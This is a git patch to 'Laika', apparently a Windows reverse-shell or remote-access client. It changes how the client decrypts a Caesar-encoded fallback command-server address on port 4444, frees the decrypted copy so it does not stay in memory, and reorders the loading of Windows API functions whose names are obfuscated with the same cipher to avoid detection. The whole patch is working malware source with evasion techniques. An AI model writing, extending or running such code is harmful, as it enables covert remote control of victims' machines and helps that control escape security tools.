From 02014633a1bddbb0575aad00e69e6df1e87ad3b5 Mon Sep 17 00:00:00 2001 From: ALittlePatate Date: Wed, 15 Feb 2023 19:53:56 +0100 Subject: [PATCH] fix: decrypting an ip that is already decrypted --- Laika/config.h | 8 +++++++- Laika/main.c | 17 +++++++++++++---- Laika/resolve_apis.c | 23 ++++++++++++----------- Laika/resolve_apis.h | 2 ++ 4 files changed, 34 insertions(+), 16 deletions(-) diff --git a/Laika/config.h b/Laika/config.h index eabc268..29e964f 100644 --- a/Laika/config.h +++ b/Laika/config.h @@ -1,3 +1,9 @@ +#define FALLBACK_SERVERS 1 + char* fallback_servers[1] = { - "=3=3=3=", + "6>736;=3638:", +}; + +int fallback_servers_ip[1] = { + 4444, }; \ No newline at end of file diff --git a/Laika/main.c b/Laika/main.c index d50abde..44d31cb 100644 --- a/Laika/main.c +++ b/Laika/main.c @@ -105,8 +105,6 @@ void SendShellEndedSignal(SOCKET sock) { } } -#define FALLBACK_SERVERS 4 - int serv = -1; int main() { InitApis(); @@ -124,7 +122,6 @@ int main() { struct sockaddr_in server; char* server_reply = (char*)Api.malloc(BUFFER_SIZE); server.sin_family = AF_INET; - server.sin_port = Api.htons(1337); WORD wVersionRequested = MAKEWORD(2, 2); WSADATA wsaData; @@ -142,7 +139,19 @@ retry: if (serv > FALLBACK_SERVERS - 1) { serv = 0; } - server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(fallback_servers[serv])); + + //on fait une copie de l'ip chiffrée, puis on la free + //ça évite qu'elle reste dans la mémoire trop longtemps + //ça évite aussi qu'on utilise CAESAR_DECRYPT sur une ip déjà décryptée + size_t len = strlen(fallback_servers[serv]); + char* Tmp = Api.malloc(len + 1); + Api.strcpy(Tmp, fallback_servers[serv]); + + server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(Tmp)); + + Api.free(Tmp); + + server.sin_port = Api.htons(fallback_servers_ip[serv]); //Create socket sock = Api.socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); diff --git a/Laika/resolve_apis.c b/Laika/resolve_apis.c index 9c630bd..7fc15df 100644 --- a/Laika/resolve_apis.c +++ b/Laika/resolve_apis.c @@ -13,6 +13,18 @@ void InitApis() { } Api.GetProcAddress = (TGetProcAddress)GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyUwthFiiwjxx")); + + hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq")); + if (!hMsvcrt) { + return; + } + Api.strcpy = (Tstrcpy)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywhu~")); + Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth")); + Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj")); + Api.strncmp = (Tstrncmp)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywshru")); + Api.mbstowcs = (Tmbstowcs)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rgxyt|hx")); + Api.memset = (Tmemset)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rjrxjy")); + Api.ReadFile = (TReadFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("WjfiKnqj")); Api.WriteFile = (TWriteFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjKnqj")); Api.CloseHandle = (TCloseHandle)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("HqtxjMfsiqj")); @@ -40,17 +52,6 @@ void InitApis() { Api.inet_addr = (Tinet_addr)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("nsjydfiiw")); Api.WSAStartup = (TWSAStartup)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFXyfwyzu")); Api.WSAGetLastError = (TWSAGetLastError)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFLjyQfxyJwwtw")); - - hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq")); - if (!hMsvcrt) { - return; - } - - Api.memset = (Tmemset)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rjrxjy")); - Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth")); - Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj")); - Api.strncmp = (Tstrncmp)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywshru")); - Api.mbstowcs = (Tmbstowcs)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rgxyt|hx")); } void FreeApis() { diff --git a/Laika/resolve_apis.h b/Laika/resolve_apis.h index 12335fa..2faa1c3 100644 --- a/Laika/resolve_apis.h +++ b/Laika/resolve_apis.h @@ -21,6 +21,7 @@ typedef void* (WINAPI* Tmalloc)(size_t); typedef void(WINAPI* Tfree)(void*); typedef int(WINAPI* Tstrncmp)(const char*, const char*, size_t); typedef size_t(WINAPI* Tmbstowcs)(wchar_t*, const char*, size_t); +typedef char*(WINAPI* Tstrcpy)(char*, const char*); typedef BOOL(WINAPI* TReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED); typedef BOOL(WINAPI* TWriteFile)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED); @@ -67,6 +68,7 @@ typedef struct ApiList { TGetProcAddress GetProcAddress; Tmbstowcs mbstowcs; + Tstrcpy strcpy; } API; void InitApis();